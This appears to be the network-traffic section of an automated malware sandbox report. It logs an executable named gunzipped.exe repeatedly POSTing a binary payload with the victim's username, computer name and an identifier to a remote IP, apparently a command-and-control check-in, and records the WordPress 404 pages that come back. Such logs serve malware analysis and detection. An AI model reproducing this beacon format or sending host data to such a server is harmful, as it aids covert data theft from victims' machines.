Apr 17, 2024 03:16:56.425570011 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:16:56.425580978 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:16:56.425592899 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:16:56.425604105 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:16:56.425616026 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:16:56.425627947 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:16:56.425638914 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:16:56.425652027 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:16:56.425663948 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49709	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:16:56.772779942 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:16:56.980240107 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:16:57.881382942 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:16:56 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:16:57.881400108 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:16:57.881409883 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:16:57.881419897 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:16:57.881434917 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:16:57.881445885 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:16:57.881458044 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:16:57.881469965 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:16:57.881483078 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:16:57.881496906 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49710	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:16:58.235959053 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:16:58.440047979 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:16:59.342629910 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:16:58 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:16:59.342648029 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:16:59.342659950 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:16:59.342686892 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:16:59.342700005 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
